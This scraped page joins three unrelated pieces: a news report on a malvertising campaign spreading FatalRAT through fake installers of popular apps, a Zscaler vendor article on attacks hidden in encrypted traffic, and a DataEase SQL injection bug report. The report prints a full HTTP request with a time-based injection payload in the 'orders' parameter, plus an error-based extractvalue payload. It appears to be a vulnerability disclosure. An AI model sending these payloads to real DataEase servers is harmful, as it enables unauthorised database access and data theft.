The attacks involve purchasing ad slots to appear in Google search results that direct users searching for popular applications to rogue websites hosting trojanized installers, ESET said in a report published today. The ads have since been taken down.

Some of the spoofed applications include Google Chrome, Mozilla Firefox, Telegram, WhatsApp, LINE, Signal, Skype, Electrum, Sogou Pinyin Method, Youdao, and WPS Office.

"The websites and installers downloaded from them are mostly in Chinese and in some cases falsely offer Chinese language versions of software that is not available in China," the Slovak cybersecurity firm said, adding it observed the attacks between August 2022 and January 2023.

A majority of the victims are located in Taiwan, China, and Hong Kong, followed by Malaysia, Japan, the Philippines, Thailand, Singapore, Indonesia, and Myanmar.

The most important aspect of the attacks is the creation of lookalike websites with typosquatted domains to propagate the malicious installer, which, in an attempt to keep up the ruse, installs the legitimate software, but also drops a loader that deploys FatalRAT.

In doing so, it grants the attacker complete control of the victimized computer, including executing arbitrary shell commands, running files, harvesting data from web browsers, and capturing keystrokes.

"The attackers have expended some effort regarding the domain names used for their websites, trying to be as similar to the official names as possible," the researchers said. "The fake websites are, in most cases, identical copies of the legitimate sites."

The findings arrive less than a year after Trend Micro disclosed a Purple Fox campaign that leveraged tainted software packages Adobe, Google Chrome, Telegram, and WhatsApp as an arrival vector to propagate FatalRAT.

They also arrive amid a broader abuse of Google Ads to serve a wide range of malware, or alternatively, take users to credential phishing pages.

In a related development, Symantec's Threat Hunter Team shed light on another malware campaign that targets entities in Taiwan with a previously undocumented .NET-based implant dubbed Frebniis.

"The technique used by Frebniis involves injecting malicious code into the memory of a DLL file (iisfreb.dll) related to an IIS feature used to troubleshoot and analyze failed web page requests," Symantec said.

"This allows the malware to stealthily monitor all HTTP requests and recognize specially formatted HTTP requests sent by the attacker, allowing for remote code execution."

The cybersecurity firm, which attributed the intrusion to an unknown actor, said it's currently not known how access to the Windows machine running the Internet Information Services (IIS) server was obtained.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Using Google Ads to Spread FatalRAT Malware Disguised as Popular Apps

It's a classic attacker move: Use security protections against those who deploy them. But organizations can still defuse and prevent these encrypted attacks.

Once upon a time, encrypted traffic was considered the safe, secure option for browsing and doing business online. However, going back to December 2013, the Google Transparency Report shows just 48% of Web traffic was encrypted. Flash forward to today, and the volume of encrypted Web traffic is up to 95%. However, the threat landscape has changed a lot since 2013, and now we find the majority of cyberthreats lurking within encrypted channels.

Hidden in your encrypted Internet traffic layers are malware payloads, phishing scams, sensitive data leaks, and more. To understand this better, the State of Encrypted Attacks 2022 Report analyzed 24 billion threats from October 2021 to September 2022 to reveal details on threats embedded in HTTPS traffic, including SSL and TLS. The report shows a consistent upward trend of attacks using encrypted channels — from 57% in 2020 to 80% in 2021 — ultimately finding that more than 85% of attacks were encrypted in 2022. There were other major findings as well.

**Most Encrypted Threats Involve Malware**

While cybercriminals hide a variety of attack tactics in encrypted traffic, malware remains the most prevalent. Malicious scripts and payloads used throughout the attack sequence make up nearly 90% of the encrypted attack tactics blocked in 2022.

    

Fig. 1. Distribution of 2022 encrypted attacks. Source: Zscaler ThreatLabz

Malware continues to pose the greatest threat to individuals and businesses across nine key industries, with manufacturing, education, and healthcare the most common targets. This category includes ransomware, which remains a top concern for CISOs, as ransomware attacks have increased by 80% year over year.

The most prevalent malware families the ThreatLabz team observed abusing encrypted channels include ChromeLoader, Gamaredon, AdLoad, SolarMarker, and Manuscrypt.

**US, India Are Top Targets for Encrypted Attacks**

The five countries most targeted by encrypted attacks in 2022 were the US, India, South Africa, the UK, and Australia. In addition, several countries saw significant upticks in targets year over year, including Japan (+613%), the US (+155%), and India (+87%).

**Encrypted Attacks Increased in Manufacturing, Education**

More than doubling in encrypted attacks (239%), manufacturing displaced technology as the most targeted industry in 2022. Encrypted attacks against the education industry were also up significantly (134%). Attackers particularly favored manufacturing over other sectors as a target for ad spyware. It is also one of two industries most often phished via encrypted channels — the other being healthcare.

    

Fig. 2. Top vertical industries targeted by encrypted attacks in 2022. Source: Zscaler ThreatLabz

Today, most attacks leverage SSL or TLS encryption, which is resource-intensive to inspect at scale and best done with a cloud-native proxy architecture. While legacy firewalls support packet filtering and stateful inspection, their resource limitations make them poorly suited for this task. This creates a critical need for organizations to implement cloud-native architectures that support full inspection of encrypted traffic in alignment with zero-trust principles.

**How to Protect Yourself**

For defenders, the imperative is clear: all encrypted traffic must be thoroughly inspected to detect and stop cyberthreats before they cause damage. While we wait for governments, compliance frameworks, and other vendors to catch up with this reality, it will be up to defenders and leaders to raise the flag and champion initiatives to mitigate this common threat tactic. Zero-trust strategies and architectures — in which you trust nobody and inspect and authenticate everything — are the most effective way to protect your organization from encrypted attacks and other advanced threats.

Attacks start with reconnaissance and an initial compromise of an endpoint or asset exposed to the Internet. Once inside, attackers perform lateral propagation, including reconnaissance and establishing a network foothold. Finally, attackers act to achieve their objectives, which often involve data exfiltration.

Your defenses should include controls for each of those stages. Minimize the attack surface by making internal apps invisible to the Internet, and prevent compromise by using cloud-native proxy architecture to inspect _all_ traffic inline and at scale, enforcing consistent security policies. Organizations should also stop lateral movement by connecting users directly to applications (rather than the network) to reduce the attack surface, and contain threats using deception and workload segmentation. They can also stop data loss by inspecting all Internet-bound traffic, including encrypted channels, to prevent data theft.

If you are looking to minimize the risk of encrypted attacks for your organization, consider these recommendations as part of your adoption strategy:

*   Use a cloud-native, proxy-based architecture to decrypt, detect, and prevent threats in all encrypted traffic at scale.
*   Leverage an AI-driven sandbox to quarantine unknown attacks and stop patient-zero malware.
*   Inspect all traffic, all the time, whether a user is at home, at headquarters, or on the go, to ensure everyone is consistently protected against encrypted threats.
*   Terminate every connection to allow an inline proxy architecture to inspect all traffic, including encrypted traffic, in real-time — before it reaches its destination — to prevent ransomware, malware, and more.
*   Protect data using granular context-based policies, verifying access requests and rights based on context.
*   Eliminate the attack surface by connecting users directly to the apps and resources they need, never to networks.

Read more Partner Perspectives from Zscaler.

Encrypted Traffic, Once Thought Safe, Now Responsible For Most Cyberthreats

SQL Injection vulnerability in dataease before 1.2.0, allows attackers to gain sensitive information via the orders parameter to /api/sys_msg/list/1/10.

\*\*DataEase \*\*  
1.1.0-rc2

**Bug 描述**  
SQL Injection

\*\*Bug \*\*  
url:/api/sys\_msg/list/1/10

    POST /api/sys_msg/list/1/10 HTTP/1.1
    Host: demo.dataease.io
    Cookie: sysUiInfo={%22ui.logo%22:{%22paramKey%22:%22ui.logo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:1%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginLogo%22:{%22paramKey%22:%22ui.loginLogo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:2%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginImage%22:{%22paramKey%22:%22ui.loginImage%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:3%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginTitle%22:{%22paramKey%22:%22ui.loginTitle%22%2C%22paramValue%22:%22%E4%BA%BA%E4%BA%BA%E5%8F%AF%E7%94%A8%E7%9A%84%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%8F%AF%E8%A7%86%E5%8C%96%E5%88%86%E6%9E%90%E5%B7%A5%E5%85%B7%22%2C%22type%22:%22text%22%2C%22sort%22:4%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.title%22:{%22paramKey%22:%22ui.title%22%2C%22paramValue%22:%22%22%2C%22type%22:%22text%22%2C%22sort%22:5%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.favicon%22:{%22paramKey%22:%22ui.favicon%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:6%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.demo.tips%22:{%22paramKey%22:%22ui.demo.tips%22%2C%22paramValue%22:%22user:%20demo%20password:%20dataease%22%2C%22type%22:%22text%22%2C%22sort%22:100%2C%22file%22:null%2C%22fileName%22:null}}; language=zh_CN; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Length: 65
    Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
    Link-Pwd-Token: undefined
    Accept-Language: zh-CN
    Sec-Ch-Ua-Mobile: ?0
    Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Type: application/json;charset=UTF-8
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Origin: https://demo.dataease.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.dataease.io/?
    Accept-Encoding: gzip, deflate
    Connection: close
    
    {"orders":["(select*from(select+sleep(10)union/**/select+1)a) "]}
    

  
  
payload：extractvalue('anything',concat('~',(select database())))

Tag

#chrome